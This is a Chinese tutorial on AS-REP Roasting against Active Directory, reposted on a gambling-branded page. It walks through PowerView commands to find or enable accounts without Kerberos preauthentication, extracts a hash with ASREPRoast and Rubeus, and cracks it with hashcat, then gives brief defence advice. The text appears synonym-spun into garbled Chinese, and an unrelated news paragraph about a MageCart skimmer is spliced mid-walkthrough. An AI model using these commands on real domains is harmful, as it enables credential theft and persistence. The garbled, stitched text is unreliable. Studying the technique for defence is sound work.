域渗入——AS-REP Roasting | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

域渗入——AS-REP Roasting

申博_新闻事件 申博 24次浏览 未收录 0个评论

0x00 媒介

AS-REP Roasting同Kerberoasting相似,假如满足条件,就能够取得用户口令的hash,再连系hashcat举行破解,末了能够复原出用户的明文口令。

本文将要参考公然材料,连系本身的明白,引见AS-REP Roasting的应用要领,末了给出防备发起。

0x01 简介

本文将要引见以下内容:

· AS-REP Roasting的道理

· AS-REP Roasting的应用条件

· AS-REP Roasting的应用要领

· 破解hash的要领

· 防备发起

0x02 AS-REP Roasting

1.简介

关于域用户,假如设置了选项”Do not require Kerberos preauthentication”,此时向域控制器的88端口发送AS-REQ要求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23″(18200)的花样,接下来能够运用hashcat对其破解,终究取得该用户的明文口令。

2.应用条件

域用户设置了选项”Do not require Kerberos preauthentication”

通常情况下,该选项默许不会开启。

3.应用思绪

通常在域渗入中用来保持权限。

须要先取得对指定用户的GenericWrite权限,应用思绪以下:

1、开启用户选项”Do not require Kerberos preauthentication”

2、导出hash并破解

3、封闭用户选项”Do not require Kerberos preauthentication”

0x03 AS-REP Roasting的应用要领

1.寻觅满足条件的用户

用户须要开启选项”Do not require Kerberos preauthentication”

这里能够运用LDAP查询满足条件(userAccountControl:1.2.840.113556.1.4.803:=4194304)的用户。

参考材料:

https://support.microsoft.com/en-us/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

https://github.com/PowerShellMafia/PowerSploit/blob/445f7b2510c4553dcd9451bc4daccb20c8e67cbb/Recon/PowerView.ps1#L4769

DONT_REQ_PREAUTH项对应的值为4194304。

PowerView的敕令以下:

Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired -Verbose

示例以下图:

域渗入——AS-REP Roasting

只显示distinguishedname项:

国家棒球名人堂网站被植入信息窃取脚本

位于纽约州库珀斯敦的国家棒球名人堂的网站被黑客入侵,其中包括了一个恶意的MageCart脚本,该脚本窃取了在网站上购买商品的客户的支付信息。 根据加州安全漏洞通知服务提交的通知,美国国家棒球名人堂网站在2018年11月15日至2019年5月14日期间向其在线商店注入了恶意脚本。  国家棒球名人堂(“名人堂”)重视并尊重您的信息隐私,这就是为什么我们写信通知您,最近可能涉及您的一些个人信息的事件。 通知提醒受影响的用户, 2019年6月18日,我们了解到您的一些信息可能是由未经授权的第三方获取的,该第三方将恶意计算机代码放置在名人堂网站商店(shop.baseballhall.org)

Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

示例以下图:

域渗入——AS-REP Roasting

2.开启和封闭选项”Do not require Kerberos preauthentication”

开启选项意味着对用户增加属性(userAccountControl=4194304)。

开启选项的敕令以下:

Import-Module .\PowerView.ps1
Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose

封闭选项意味着删除用户属性(userAccountControl=4194304)。

注:这里能够再次举行异或运算,两次异或相当于不转变原数值,即删除用户属性(userAccountControl)。

封闭选项的敕令以下:

Import-Module .\PowerView.ps1
Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose

3.导出hash

(1)运用Powershell

https://github.com/HarmJ0y/ASREPRoast

导出一切可用用户hash的敕令以下:

Import-Module .\ASREPRoast.ps1
Invoke-ASREPRoast -Verbose |fl

示例以下图:

域渗入——AS-REP Roasting

导出指定用户hash的敕令以下:

Get-ASREPHash -UserName testb -Verbose

示例以下图:

域渗入——AS-REP Roasting

提掏出hash:

[email protected]:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3

(2)运用C#(Rubeus)

https://github.com/GhostPack/Rubeus

敕令以下:

Rubeus.exe asreproast

示例以下图:

域渗入——AS-REP Roasting

4.运用hashcat举行破解

提掏出hash:

[email protected]:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3

拼接成hashcat能够辨认的花样须要在$krb5asrep背面增加$23。

hashcat运用字典破解的参数以下:

hashcat -m 18200 '[email protected]:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3' /usr/share/john/password.lst -o found.txt --force

参数申明:

/usr/share/john/password.lst为字典文件的位置 -o found.txt示意输出效果的位置。

0x04 防备发起

1.确保域内不存在开启”Do not require Kerberos preauthentication”的用户。

扫描要领(运用PowerView):

Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired -Verbose

2.域用户强迫运用庞杂口令,进步被字典和暴力破解的难度。

0x05 小结

本文引见了AS-REP Roasting在域渗入中的应用条件和要领,给出防备发起。

原文地点: https://www.4hou.com/penetration/19632.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明域渗入——AS-REP Roasting
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址